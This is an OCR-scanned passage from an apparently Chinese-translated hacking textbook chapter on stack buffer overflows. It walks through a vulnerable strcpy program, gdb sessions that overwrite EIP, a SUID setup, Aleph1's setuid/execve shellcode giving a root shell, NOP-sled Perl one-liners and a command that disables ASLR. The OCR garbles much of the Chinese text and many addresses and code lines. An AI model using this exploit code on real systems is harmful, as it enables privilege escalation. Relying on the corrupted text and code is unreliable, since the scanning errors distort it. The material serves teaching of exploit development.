冲 区 溢出 。 有 关内 存 和 编译 器 保护 方面 最 新 的 讨论 将 放 在 第 12 章 。 


i. 3 
—= 


CEILS, PR AAA (call) E EF WR PIE: 


0x8048393 <maint3>: mov Oxc (sebp) , eax 
0x8048396 <main+6>: add S0x8, teax 

0x8048399 <main+9>: pushl (%eax) 

0x804839b <maint+tll>: mov Oxc (Sebp) , seax 
0x804839e <maintl4>: add SOx4, teax 

Ox80483al <main+17>: pushl (%eax) 

0x80483a3 <maint19>: call  0x804835c <greeting> 


被 调用 函数 的 职责 是 ， 首 先 将 调用 程序 的 EBP 寄存 器 内 容 保存 到 堆栈 上 ， 其 次 
将 当前 ESP 寄 存 器 内 容 保存 到 EBP 寄存 器 (设置 当前 栈 帧 ), 然后 减少 ESP 寄 存 器 数值 ， 
从 而 为 该 函数 的 本 地 变量 腾 出 空间 。 最 后 ， 该 冰 数 获得 机 会 执行 它 的 语句 。 将 这 个 
WERK A PIA E HB (Prolog): 

TEILS Vr, PRAE RWE ESR P I: 


0x804835c «greeting»: push ebp 
0x804835d <greeting+1l>: mov $esp, ebp 
0x804835f <greeting+3>: sub $0x190,$esp 


485: Val Fd E ZUTE 38 n UR FEE < 88 Br E 48 EI] oJ — TF SET xe TEES P TECH Jn 890 
EBP， 并 清空 堆栈 。 有 效 地 清空 堆栈 也 是 leave 语 句 功能 的 一 部 分 。 然 后 ， 在 返回 时 ， 
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从 堆栈 中 弹出 所 保存 的 EIP 值 。 将 这 个 过 程 称 为 函数 尾部 (Epilog)。 如 果 一 切 运转 正 
常 , EIP 将 仍 保存 着 要 加 载 的 下 一 条 指令 的 地 址 , 因此 程序 将 继续 执行 该 函数 调用 之 
后 的 语句 。 

在 汇编 代码 中 ， 函 数 尾部 看 起 来 就 像 这 样 ; 


0x804838e <greetingt50>: leave 
0x804838f «greeting-t51»: ret 


(ES Dist HH EP RE RH SI E NEL BITE FT AS < 
11.2 缓冲 区 溢出 


你 已 经 掌握 这 些 基 础 知识 ， 接 下 来 切入 正题 。 

第 2 草包 介绍 过 , 绥 冲 区 用 于 在 内 存 中 存储 数据 。 最 令 人 感 兴趣 的 是 存放 字 付 串 
的 缓冲 区 。 绥 冲 区 本 身 没有 任何 机 制 能 阻止 将 过 多 数据 存放 到 预 留 的 空间 中 。 实 际 
上 ， 如 果 程 序 员 比较 粗心 的 话 ， 分 配 的 空间 很 快 束 会 用 完 。 例 如 ， 以 下 语句 在 内 存 
中 声明 了 一 个 10 字 节 的 字符 串 : 


char str1[10]; 
如 果 执行 下 面 的 语句 ， 会 发 生 什么 情况 ? 

strcpy(strl, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); 
下 面 就 来 看 看 。 


//overflow.c 
#include <string.h> 
main() { 
char str1[10]; //declare a 10 byte string 
//next, copy 35 bytes of "A" to stri 
sLErepyistrl, "DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") ; 


PRIA TK FMA ee VES FIT A FEI: 


S //notice we start out at user privileges "$" 

$ gcc -ggdb -mpreferred-stack-boundary-2 -fno-stack-protector \ 
-o overflow overflow.c 

S ./overflow 

09963: Segmentation fault 
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注意 : 在 Linux 操 作 系 统 中 ， 有 必要 指出 ， 提 示 符 约定 可 必 助 灰 帽 黑客 区 分 
用 户 级 shell 和 根 级 shell。 通 常 而 言 ， 根 级 shell 的 提示 符 中 包含 # 符 号 ， 而 用 
户 级 shell 的 提示 符 中 则 有 $ 符 号 。 通过 这 个 细微 之 处 ， 可 以 知悉 何 时 成 功 提 
升 了 权限 , Hil, 为 保险 起 见 , 仍 需 要 使 用 whoami 或 ld 之 类 的 命令 进行 验证 。 


为 什么 会 得 到 一 条 上段 故障 的 错误 提示 呢 ? 下 面 启动 gdb 来 查找 原因 : 


$gdb -q overflow 
(gdb) run 
Starting program: /book/overflow 


Program received signal SIGSEGV, Segmentation fault. 

0x41414141 in ?? () 

(gdb) info reg eip 

eip 0x41414141 0x41414141 

(gdb) q 

A debugging session is active. 

Do you still want to close the debugger?(y or n) y 

$ 

可 以 看 出 , 在 gdb 中 运行 这 个 程序 时 ,， 当 试图 执行 0x41414141 处 的 指令 时 程序 斋 

b X ed E for wrimtte 接 下 来 , 可 检查 EIP 
是 否 被 这 些 A 破 坏 : 没 错 ，EIP 里 面 全 是 A， 因 此 程序 注定 要 朋 沉 。 记 住 ， 当 函数 (这 
ne ty 将 从 堆栈 中 弹出 所 保存 的 EIP 值 并 执行 下 一 条 语句 。 由 
于 地 址 0x41414141 超 出 了 进程 段 的 地 址 范围 ， 因 此 会 得 到 一 条 段 故 障 的 错误 提示 。 


QNS 警告 : 大 多 数 现 代 操 作 系 统 使 用 地 址 空间 布局 随机 化 (Address Space Layout 
= Randomization, ASLR) 技 术 将 堆栈 内 存 调用 随机 化 ， 而 这 会 给 本 草 剩余 部 
分 内 容 带 来 混 消 。 可 按照 下 面 的 操作 茶 用 ASLR 功 能 : 


techo "0" > /proc/sys/kernel/randomize va space. 
FAA Uf P dimeet.cfE T. 
11.2.1 实验 11-1: meet.ciüdi 
Filz BUCH 8238 )meet.cFE/T : 
//meet.c 
#include <stdio.h> // needed for screen printing 
#include <string.h> 
greeting (char *templ, char *temp2){ // greeting function to say hello 


char name[400]; // string variable to hold the name 
strcpy (name, temp2); // copy the function argument to name 
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printf("Hello $s $s\n", templ, name); //print out the greeting 

} 

main(int argc, char * argv[]){ //note the format for arguments 
greeting (argv[1], argv[2]); //call function, pass title & name 
printf("Bye $s $s\n", argv[1], argv[2]); //say "bye" 

) //exit program 


为 使 meet.c 程 序 中 400 字 节 的 缓冲 区 洲 出 ， 需 要 使 用 另 一 个 工具 Perl。Perl 是 一 门 


解释 型 语言 ， 也 意味 看 Perl 语 言 程序 不 需要 预先 编译 ， 这 就 使 得 Perl 在 命令 行 上 使 用 
起 来 非 笔 方便。 现在 只 需要 理解 一 条 Perl 命 令 即 可 : 


"perl -e "print "A" x 600'' 


注意 : 这 里 使 用 反 引号 () 将 Perl 命 令 引 了 起 来 ,从 而 让 shell 解 释 器 执行 该 命 
令 并 返回 值 。 


这 条 命令 只 是 同 标 准 和 输出 打印 600 个 字符 A 一 一 试 试看 ! 
利用 这 pein 首先 加 程序 中 填充 10 个 A( 请 记 住 ，meetc 有 两 个 参数 ): 


# //notice, we have switched to root user "#" 

# gcc -ggdb -mpreferred-stack-boundary-2 -fno-stack-protector -z 
execstack -o meet meet.c 

#./meet Mr “perl -e 'print "A" x 10'" 

Hello Mr AAAAAAAAAA 

Bye Mr AAAAAAAAAA 

# 


接 下 来 ， 同 meet.c 程 序 填 充 600 个 A( 作 为 第 二 个 参数 )， 如 下 所 示 : 


#./meet Mr “perl -e 'print "A" x 600'^ 
Segmentation fault 


不 出 所 料 ， 大 小 为 400 字 节 的 缓冲 区 溢出 了 。 希望 EIP 也 是 如 此 。 为 验证 这 一 点 ， 


再 次 启动 gdb: 


# gdb -q meet 

(gdb) run Mr ‘perl -e 'print "A"x600'" 

The program being debugged has been started already. 
Start it from the beginning? (y or n) y 

Starting program: /tmp/meet Mr "perl -e 'print "A"x600'" 


Program received signal SIGSEGV, Segmentation fault. 
next env entry (position-«optimized out») at arena.c:220 
220  arena.c: No such file or directory. 

(gdb) info reg Seip 

eip Oxb7e6f9e9 . 0xb7e6f9e9 «ptmalloc init+121> 
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注意 : MARZ AAT He LA PTA 这 里 只 是 为 了 讲解 概念 ， 而 不 是 
去 关注 具体 的 内 存 数据 。 根据 使 用 的 gcc 版 本 和 其 他 要 素 , 程序 般 演 的 部 分 
可 能 有 所 不 同 。 


不 仅 控 制 不 了 EIP， 击 且 EIP 已 指 癌 内 存 中 为 一 处 很 远 的 地 方 。 如 果 看 看 meet.c 
源 人 代码， 那么 可 发 现 ，greeting 函 数 中 的 strepy0 函 数 调 用 之 后 还 有 一 个 printt0 调 用 。 
这 个 printtO0 又 调用 libc 库 中 的 viprinttO 。vfprinttO 函 数 又 调用 strlen0。 但 完 竟 是 哪里 
HE f E? 这 里 进行 了 多 次 租 套 函数 调用 ， 因 此 存在 多 个 栈 帧 ， 每 一 个 都 被 压 入 栈 
中 。 当 溢出 时 ， 一 定 会 有 printtO 函 数 的 传 入 参数 被 破坏 了 。 回 顾 11.1 节 中 的 函数 调 
Fu ZA EE HE. nIAgreeting KA BOM Dy HE oi n A 11-2 T2758: 


低 内 存 地 址 : PM" 
Ox11111111 «— — REKOH 


图 11-2” 栈 帧 布局 
如 果 写 入 的 数据 超过 堆栈 中 压 入 EIP 的 位 置 ， 就 会 将 从 temp1l 开 始 的 函数 参数 禾 
六 。 由 于 printf0 函 数 使 用 temp1， 因 此 就 会 有 问题 。 下 耐用 gdb 做 个 验证 。 再 次 运行 
gdb 时 ， 可 竹 试 获得 源 代码 列表 ， 如 下 所 示 : 


(gdb) list 

1 #include <stdio.h> // needed for screen printing 

2 #include <string.h> 

E 

4 greeting (char *temp1l, char *temp2) ( // greeting function to say hello 
53 char name [400]; // string variable to hold the name 

6 strcpy(name, temp2); // copy the function argument to name 
7 printf ("Hello $s $s\n", templ, name); //print out the greeting 
8 } 

9 main(int argc, char * argv[]){ //note the format for arguments 
10 greeting(argv[1], argv[2]); //call function, pass title & name 
(gdb) b 7 


Breakpoint 1 at 0x5e5: file meet.c, line 7. 
(gdb) run Mr ‘perl -e 'print "A"x600' 
Starting program: /tmp/meet Mr “perl -e 'print "A"x600'" 


Breakpoint 1, greeting (templ-Oxbffffc73 "Mr", 
temp2z0xbffffc76 'A' «repeats 200 times>...) at meet.c:7 
‘| strcpy (name, temp2); // copy the function argument to name 
从 上 和 面 加 粗 显 示 的 行 中 可 以 看 出 ， 函 数 的 参数 temp1 和 temp2 已 被 破 坏 。 这 些 指 
针 现 在 指向 地 址 0x41414141 处 ， 该 处 存放 的 值 为 " "或 空 oulD)。 问 题 在 于 printfO 不 会 
将 空 值 作为 唯一 的 输入 而 傈 下 来 。 因 此 ， 下 面 首 先 从 较 小 数目 的 A( 如 405) 开 始 ， 然 
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后 慢 慢 地 增加 ， 直 到 出 现 所 期 望 的 效 末 为 止 : 


(gdb) d 1 «remove breakpoint 1» 
(gdb) run Mr ‘perl -e 'print "A" x 405'^ 

The program being debugged has been started already. 

Start it from the beginning? (y or n) y 


Starting program: /book/meet Mr ‘perl -e "print "A" x 405'° 
Hello Mr 

^A A AAA DD BD DA AD A B B 5 A B5 DA A B5 A B B B DA DB D 5 A A B A 5 A A 5 A DB 5 5 5 DA DA AA 5f 

[more 'A's removed for brevity] 

AAA 


Program received signal SIGSEGV, Segmentation fault. 
0x80000645 in main (argc-0, argv-0x0) at meet.c:12 


12 printf("Bye $s $s\n", argv[1], argv[2]); //say "bye" 
(gdb) info reg ebp eip 

ebp Oxbffft0041 Oxbfftft0041 

eip 0x80000045 0x80000645 <main+47> 

(gdb) 


(gdb) run Mr ‘perl -e "print "A" x 408'" 

The program being debugged has been started already. 

Start it from the beginning? (y or n) y 

Starting program: /book/meet Mr ‘perl -e "print "A" x 408'" 
Hello Mr 

ADAADA NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
NAARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAR 

[more 'A's removed for brevity] 

AAA 


Program received signal SIGSEGV, Segmentation fault. 
0x80000600 in greeting ( 
templ-«error reading variable: Cannot access memory at address 


Ox41414149>, 
temp2=<error reading variable: Cannot access memory at address 
0x4141414d») 
at meet.c:8 
8 printf("Hello $s $s\n", templ, name); //print out the greeting 
(gdb) info reg ebp eip 
ebp 0x41414141 0x41414141 
eip 0x80000600 0x80000600 <greeting+48> 
(gdb) 


(gdb) run Mr ‘perl -e 'print "A" x 412'- 
The program being debugged has been started already. 
Start it from the beginning? (y or n) y 


Starting program: /book/meet Mr ‘perl -e "print "A" x 412'° 
Hello 
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^ A DB D D BA D B D DB D A A A B DB DB B D D A B DA DB B A A DB D B DA A B A 5A A 5 5 D 5 5 D D^ A A A 5 pP 

NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
| T ce i 

[more 'A's removed for brevity| 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 
(gdb) info reg ebp eip 


ebp 0x41414141 0x41414141 
eip 0x41414141 0x41414141 
(gdb) q 


A debugging session is active. 

Do you still want to close the debugger?(y or n) y 

it 

可 以 看 出 ，gdb 中 发 生 段 错误 时 ，EIP 的 当前 值 会 显示 出 来 。 

重要 的 是 要 明白 ， 这 些 数字 (400~412) 并 不 重要 ， 关 键 在 于 要 从 较 低 的 值 开 始 尝 
试 ， 然 后 逐渐 增加 到 将 保存 的 EIP 刚 好 流出 ， 仅 此 而 已 。 这 是 因为 printf 调 用 紧 接 在 
发 生 济 出 之 后 。 有 时 可 用 的 空间 可 能 会 于 多， 因此 不 必 过 分 担心 这 个 问题 。 例 如 ， 
如 采 在 有 漏洞 的 strcpy 命 令 之 后 没有 任何 代码 ， 那 么 这 时 在 412 字 节 之 外 淤 出 束 应 该 
没有 任何 问题 。 


of 注意 : 记 住 ， 这 里 使 用 的 缺陷 代码 是 非常 简单 的 ， 在 实际 情况 下 ， 会 遇 到 
SS 


v 与 此 类 似 甚至 更 复杂 的 问题 。 再 次 强调 , 这 里 最 重要 的 是 要 理解 相关 概念 ， 
而 非 导 致 一 段 存 在 漏洞 的 特定 代码 产生 溢出 需要 的 数字 。 


11.222 ”缓冲 区 浴 出 的 后 果 


在 处 理 缓冲 区 洲 出 时 ， 基 本 上 可 能 发 生 三 种 情况 。 第 一 种 情况 是 拒绝 服务 。 前 
面 轩 介绍 过 ， 在 处 理 进程 内 存 时 非常 容易 过 到 上 段 错误 。 但 对 软件 开发 人 员 而 言 ， 出 
现 这 个 结果 可 能 是 不 驻 中 的 万 镁 。 因 为 程序 朋 尝 引 人 关 注 ， 而 其 他 的 情况 则 可 能 不 
会 引起 注意 ， 从 而 导致 更 糟 料 的 后 来 。 

当 绥 剖 区 盗 出 时 可 能 及 生 的 第 二 种 情况 是 EPP 将 可 能 会 被 控制 ,并 以 用 户 级 访问 
权限 执行 恶意 代码 。 当 存在 漏洞 的 程序 在 用 尸 级 权限 上 运行 时 会 友 生 这 种 情况 。 

当 缓 剖 区 次 出 时 可 能 出 现 的 第 三 种 也 是 最 糟 糙 的 情况 是 ,EPP 被 控制 并 以 系统 级 
或 根 级 权限 执行 亚 意 代码 。 在 UNIX 系 统 中 ， 只 有 一 个 名 为 根 用 户 Groob 的 超级 用 户 。 
根 用 户 可 在 系统 上 执行 任何 操作 。 在 UNIX 系 统 中 ， 有 些 函 数 应 该 受到 保护 ， 只 有 
根 用 户 才 能 执行 这 些 图 数 。 例 如 ， 一 般 不 会 让 用 户 具 有 修改 口令 的 根 权 限 ， 因 此 人 
们 及 展 出 SUID(Set User DD) 概念， 临时 提升 条 进程 的 权限 以 允许 攻 些 文件 以 文件 所 
有 者 的 里 份 执行 。 举例 来 说 , passwd 命 令 的 所 有 者 是 根 用 户 , 当 普 通用 户 执 行 passwd 
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命令 时 , 这 个 进程 就 以 根 用 户 身份 运行 。 这 里 的 问题 在 于 , 当 SUID 程 序 存在 漏洞 时 ， 
漏洞 攻击 程 订 就 可 获得 该 文件 所 有 者 的 特权 (在 最 粮 料 的 情况 下 ， 获 得 根 权 限 )。 要 
让 某 个 程序 成 为 SUID， 可 运行 下 面 的 命令 : 


chmod u+s «filename» or chmod 4755 «filename» 


这 个 程序 在 运行 时 将 拥有 该 文件 所 有 痢 的 权限 。 为 了 解 这 会 市 来 什么 后 末 ， 下 
面 对 meet 程 序 进行 SUID 设 置 。 那 么 随后 对 meet 程 序 进行 漏洞 攻击 时 , 将 获得 根 权 限 。 

# chmod u+s meet 

# ls -l meet 

-rwsr-xr-x 1 root root 10004 Apr 29 16:50 meet 

上 述 结果 中 的 第 一 个 字段 表示 文件 权限 。 该 字段 的 第 一 个 位 置 用 来 表示 链接 、 
目录 或 文件 4、d 或 一 )。 接 下 来 的 3 个 位 置 依次 表示 文件 拥有 者 的 权限 : 读 取 、 写 入 、 
执行 。 正 稍 情 况 下 ，x 用 来 表示 执行 。 但 如 条 和 存在 SUID 这 种 情况 ， 那 么 这 个 位 置 束 
变 成 了 s， 如 上 所 示 。 这 意味 着 ， 当 该 文件 执行 时 ， 将 拥有 文件 所 有 者 的 权限 ， 这 里 
束 定 根 用 尸 (该 行 的 第 3 个 字段 )。 访 行 剩余 部 分 超出 了 本 音 的 讨论 范畴 ， 可 通过 
KmlPanic.com 上 的 SUID/GUID 参 考 资 料 (请 参见 本 草 有 的 “H EREE” ) 进 一 步 学 习 o 


11.3 AKHb Ems ca eB 


本 地 漏洞 攻击 要 比 远程 漏洞 攻击 容易 ， 这 是 因为 本 地 漏洞 攻击 能 够 访问 系统 内 
存 空 间 ， 而 且 更 容易 调试 漏洞 攻击 代码 。 

绥 冲 区 溢出 漏洞 攻击 的 基本 概念 是 ， 让 存在 漏洞 的 缓冲 区 溢出 ， 然 后 出 于 恶意 
目的 修改 EP。 请 牢记 ，EIP 指 回 的 是 下 一 条 要 执行 的 指令 。 恶 意 攻击 者 可 以 使 用 EP 
来 指向 恶意 代码 。 在 调用 函数 时 ,会 将 FIP 的 一 个 副本 复制 到 堆栈 上 ， 这样 当 函数 调 
用 完成 后 就 可 以 继续 执行 随后 的 指令 。 如 果 能 改变 所 保存 的 EIP 值 ,那么 当 函 数 返 回 
时 ， 从 堆栈 上 弹出 到 寄存 器 (EIP) 的 将 是 被 破坏 的 EIP 值 ， 而 EIP 将 决定 下 一 条 要 执行 
的 指令 。 


11.3.1 实验 11-2: 漏洞 攻击 的 组 件 


在 缓冲 区 沿 出 的 情况 下 ， 为 构建 一 次 有 效 的 漏洞 攻击 ， 需 要 创建 一 个 比 程序 期 
望 的 更 大 的 缓冲 区 ， 这 涉及 如 下 几 个 组 成 部 分 。 


1. NOP 雪村 


在 汇编 代码 中 ，NOP 命 令 ( 英 语 发 音 为 “no-op”) 意 味 着 不 执行 任何 操作 Cno 
operation， 空 操作 )， 而 是 移 到 下 一 个 命令 。 在 汇编 代码 中 编译 器 使 用 该 操作 进行 优 
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化 ， 对 代码 块 进行 填充 (Padding)， 从 而 实现 字 对 齐 。 黑 客 们 已 经 学 会 使 用 NOP 来 实 
现 填充 。 当 把 NOP 放 在 漏洞 攻击 绥 冲 区 的 前 面 时 ， 被 称 为 NOP 雪 权 (NOP Sled)。 如 
果 EIP 指 可 NOP 雪 权 ， 处 理 絮 将 “ 踏 着 ”该 雪 权 背 入 下 一 个 组 件 。 在 x86 系 统 中 ， 操 
作 码 0x90 表 示 NOP。 实 际 上 还 有 其 他 好 几 种 表示 方法 ， 但 0x90 是 最 常用 的 一 种 。 


2. shellcode 


术语 shellcode 专 门 用 于 表示 那些 执行 黑客 命令 的 机 堪 码 。 HUE], ABI AIR 

是 因为 恶意 代码 的 目的 是 为 恶意 攻击 者 提供 一 个 人 简单 的 shell。 在 那 之 后 ， 这 个 术语 
经 过 不 断 发 展 ， 所 包含 的 代码 已 不 仅仅 是 提供 一 个 shell， 还 包括 提升 特权 级 别 或 在 
远程 系统 中 执行 一 条 命令 等 。 这 里 ， 人 很 重要 的 一 点 是 要 明白 ，shellcode 实 际 上 是 二 
进 制 代 人 码 ， 通 常 以 十 六 进 制 形 式 表 示 。 在 网 上 有 非常 多 的 shellcode 库 ， 可 用 于 所 有 
平台 。 第 7 章 介 绍 如 何 了 编写 自己 的 shellcode。 下 面 将 使 用 Aleph1 的 shellcode( 在 一 个 
测试 程序 中 进行 演示 )， 如 下 所 示 : 

//shellcode.c 

char shellcode[] = //setuid(0) & Alephl's famous shellcode, see ref. 

"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first 

"\xeb\x1lf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 


"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\x80\xe8\xdc\xff\xff\xff/bin/sh"; 


int main() { //main function 
int *ret; //ret pointer for manipulating saved return. 
ret = (int *)&ret + 2; //set ret to point to the saved return 


//value on the stack. 
(*ret) = (int)shellcode; //change the saved return value to the 
//address of the shellcode, so it executes. 


编译 并 运行 shellcode.c 测 试 程序 ， 然 后 观察 产生 的 结果 : 


# //start with root level privileges 

#gcc -mpreferred-stack-boundary-2 -fno-stack-protector -z execstack 
-Oo shellcode shellcode.c 

#chmod uts shellcode 

#useradd -m joe 

#su joeuser //switch to a normal user (any) 
S./shellcode 

S./shellcode 

# id 

uid-0 (root) gid-1001(joeuser) groups=0 (root) ,1001 (jJoeuser) 


成 功 了 ! 我 们 获得 了 根 用 尸 的 shell 提 示 符 。 
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cou 注意 : 这 里 使 用 编译 选项 禁用 了 较 新 版 本 的 Linux 中 的 内 存 和 编译 器 保护 措 
VOX de. 这样 做 有 助 于 更 好 地 研究 本 章 主题 。 有 关 这 些 保护 措施 的 讨论 请 参见 


E: 


$12*. 


3. 重复 返回 地 址 


漏 铜 攻击 中 最 重要 的 因 妹 是 返回 地 址 的 仁 ， 必 须 完美 地 将 其 对 齐 并 进行 重复 ， 
以 此 作为 缓冲 区 溢出 的 填 元 ， 直到 覆 冀 堆 栈 上 保存 的 EP 值 。 尽管 可 直接 指 癌 
shellcode 的 起 始 处 ， 但 各 有 不 慎 ， 融 非 营 可 能 指 同 NOP 雪 要 的 中 间 东 个 位 置 。 为 此 ， 
我 们 要 做 的 第 一 件 事 情 就 是 了 解 当 前 ESP 的 值 (指向 栈 顶 )。gcc 编 译 器 允许 像 下 面 这 
样 使 用 内 联 汇编 并 对 程序 进行 编 详 ; 

#include <stdio.h> 


unsigned int get sp(void) { 
asm ("movl $esp, $eax"); 
} 


int main() { 
printf ("Stack pointer (ESP): Ox%x\n", get sp()); 


} 

$ gcc -o get sp get sp.c 

# ./get sp 

Stack pointer (ESP): Oxbffff2f8 //remember that number for later 


请 记 住 这 个 ESP 值 ， 下 面 马 上 就 会 将 这 个 值 (在 具体 测试 中 遇 到 的 值 可 能 不 同 ) 
用 作 返 回 地 址 ， 或 者 用 于 其 他 用 途 。 

此 时 ， 检 查 一 下 系统 是 否 开启 了 ASLR。 检 查 方法 非常 简单 ， 只 需要 多 次 执行 
程序 get sp 即 可 。 如 果 每 次 执行 的 输出 结果 都 有 变化 ， 就 说 明 系 统 正在 运行 某 种 堆 
栈 随机 化 保护 机 制 。 


# ./get sp 

Stack pointer (ESP): Oxbfe90d88 

# ./get sp 

Stack pointer (ESP): Oxbfcalcc8 

# ./get sp 

Stack pointer (ESP): Oxbfe88088 

稍 后 将 介绍 如 何 绕 开 访 机制 ， 现 在 只 需要 按照 本 章 前 面 的 敬告 部 分 禁用 ASLR 

EN ny: 


# echo "0" > /proc/sys/kernel/randomize va space 
下 面 再 次 检查 堆栈 (和 输出 结束 应 该 保持 不 变 ): 


# ./get sp 
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Stack pointer (ESP): Oxbffff2f8 

# ./get sp 

Stack pointer (ESP): Oxbffff2f8 //remember that number for later 

现在 就 已 经 可 靠 地 找到 了 当前 ESP， ATTA AES s BE tbt CR AE DT 
如 果 得 到 的 还 是 随机 的 堆栈 地 址 ,就 需要 将 前 面 禁用 ASLR 所 用 的 echo 命 令 行 再 运行 
— 


以 上 这 些 组 件 会 按照 如 图 11-3 所 示 的 顺序 组 合 在 一 起 。 
漏洞 攻击 缓冲 区 


存在 漏洞 的 缓冲 区 
图 11-3 ”组 合 顺序 


从 图 11-3 中 可 以 看 出 ， 这 些 重复 的 地 址 重 写 了 EIP 并 且 指 向 NOP 雪 构 , 通过 NOP 
雪 要 可 请 入 shellcode。 


11.3.2. Scy 11-3: 在 命令 行 上 进行 堆栈 溢出 漏洞 攻击 


请 记 住 ， 这 个 例子 中 攻击 缓冲 区 的 理想 大 小 为 408。 因 此 ， 下 面 将 使 用 Perl 在 命 
令 行 上 制作 一 份 指定 大 小 的 漏洞 攻击 缓冲 区 。 根 据 经 验 ， 较 好 的 做 法 是 将 一 半 的 攻 
击 绥 冲 区 用 NOP 填 满 。 在 这 里 ， 我 们 将 在 下 面 的 Perl 命 令 中 使 用 200 作 为 参数 : 

perl -e 'print "Ax90"x200'; 

以 下 这 条 类 似 的 命令 可 将 shellcode 和 输出 到 一 个 二 进 制 文件 中 (注意 这 里 使 用 了 
mH EE IS): 

$ perl -e 'print 

"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\ 

x88\x46\x07\x89\x46\x0c\xb0O\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd 


\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > sc 
Ss 


可 以 使 用 下 面 的 命令 计算 shellcode 的 长 度 : 
S we -c sc 


59 sc 


—+ 


接 下 来 需要 计算 返回 地 址 。 为 此 ,可 采用 两 种 方法 : 基于 栈 指针 地 址 执行 运算 ， 
或 使 用 gdb; 付 确 地 确定 数据 在 堆栈 中 的 位 置 。gdb 方 法 更 准确 ， 下 面 分 析 如 何 做 。 玫 
先 ， 使 应 用 程序 月 误 ， 并 可 以 轻易 识别 数据 。 己 知 的 缓冲 区 长 度 是 412， 因 此 构建 一 
个 溢出 示例 ， 看 能 侣 找到 返回 地 址 。 
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自 先 将 一 个 朋党 场景 加 载 到 gdb 中 ， 为 此 发 出 以 下 命令 : 


S gdb -q --args ./meet Mr "perl -e 'print "A"x412'^ 
Reading symbols from ./meet...done. 

(gdb) 
Starting program: /tmp/meet Mr 


^ IA A A A A DB B A A BA B B D A DB B A B DB A B A B A B A A B A D A B A B A B A A B D B A A A A A B A A B A DB B DB A A A A B A A A A AP 


run 


A A A P^ DA A A AA I AA UD [i P f X X X X A A AAA A X X PU A X D UA SU S S DP A A A AAA AAAA AAAA AAAA DP 
A Mm ff AY A igi kl At P JA X PP PUN S X X A iyiyi A iini A A AAA UN IX X A A X AA A n n L A AAAA A P fA An ri ^ f A A 
A iyi A AAD A iW PL P P DA DG AS ZG JS A AAA AA AA A P JI JN DIA DAD AS n A AAW A A A D A P IA X D, IP D A D DA DAD 
AA D A P AAR A AA AA A AAA ARB P ^ AD A^ DA p AANA AU PUN AAR AAR AA ABAD ANA A AAR EUN PUN AA UD A AA AD P À 
A iwi A} A AWA it At PV JA AOA A AA AA iwi A iyiyi A n n n At A AAA UN X X A A X DD A n n L At DL A P f P A n ri P fA X D 


AAAAAAAAAAAAAAAA 


Hello 


A AA AAAAA A AAAA AAA ANADAN [i P A X AA A A A A MOA AA DG A D RA A A AAA AA AA E X I AAA AAAAAR [i À 
^ np A ALY PA A NA AA M AAA EN X P UN UN UN A AAAA NU UN S UN AUN NA AAAAAAAAAAAAAAAABAAAAAA A BAAAAAAAA 
A AAD A igi ki A AW P H P^ fH AAA A AA A A iyiyi A iyiyi A A AWL D ^ AD p P fA JS AA A À À A mA PB At iyiyi H A nn p AAAA A 
A n n A AAD A AAA AAAA A D AD P P JA AA AA D DA A P JA JN DA D A D AAA A5 A AAA AAAAAAAAABRAAABABAA 
A iyiyi A AAA NAA RA ARK A AAA FS UN AAAAAAAAAAAAAAAAAAAAAAAAAAAA A AAA X IX IN AKA A UA UA AID 
A AA D A AWA it A A P P f S RD Pi A X A A A iyiyi A AAA PP X DU S PS A UJ A n L A AA A A AAA D AAAAAA D 


AAAAAAAAAAAAAAAA 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 


OEE GILT FE GEL ioe» TR SIEIPTXOX4141414128 s RAAT THER PNA & e 


为 此 ,可 以 使 用 examine memory 命 令 ， 并 要 求 gdb 给 出 十 六 进 制 形式 的 输出 。 由 于 得 
看 各 个 块 未 必 有 多 大 作用 ， 我 们 将 每 次 批量 查看 32 个 字 (4 字 节 )。 


(gdb) x/32z Sesp 


Uxbiri tise: Oxbffff300  Oxbffff393  0x00000000  0x00000000 
Oxbffffl4c: 0xb/el5276  0x00000003  Oxbffffle4 JOxbfffflf4 
Oxbffff15c: 0x00000000  0x00000000  0x00000000  0xb7fbÞ0000 
OÜxbffffloc: O0xb/fffc04  J Oxb/fffO00  0x00000000  0x00000003 
Oxbffff1V7c: Oxb/fb0000  0x00000000  0x855b54c5 Oxb81d98d5 
Oxbffffil8c: 0x00000000  0x00000000  0x00000000  0x00000003 
Oxbffff19c: 0x80000460  0x00000000  Oxb/feff50 Oxb/el5189 
Oxbfffflac: 0x80002000  0x00000003  0x80000460  0x00000000 


仍然 没有 看 到 A， 为 从 堆栈 中 获取 更 多 数据 ， 


到 以 下 内 容 为 止 : 


只 需要 再 次 按 下 Enter 键 ， 直 到 看 


OÜxbiffi33c- 0x00000019  Oxbffff36b  Ox0000001f Oxbffftfff2 
Oxbffff34c: 0x0000000f | Oxbffff3/b  0x00000000 0x00000000 
ÜxDrITILJOc- 0x0O0000000 QOx00000000 0x00000000 0x53000000 
OÜxbffff30c: Üxfaóc4á546  Oxfldd3d5c Oxcbo7/21/f£ | O0x69fcb9062 
Oxbffff3ic: 0x00363836 0x00000000 0x742f0000 Ox6d2f706d 
Oxbffff38c: 0x00746565 Ox4100724d  0x41414141 0x41414141 
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Oxbffff39c: 0x41414141 — 0x41414141 0x41414141 0x41414141 
Oxbffff3ac: 0x41414141 Ox41414141 0x41414141 0x41414141 


可 在 底部 看 到 ，A(Ox41) 显 示 出 来 了 。 可 安全 地 将 堆栈 地 址 0xbfftf3ac 用 作 跳 转 
地 址 (注意 ， 不 同 环 境 的 地 址 可 能 与 此 不 同 )。 这 样 ， 我 们 将 进入 NOP 轨 机， 它 给 我 
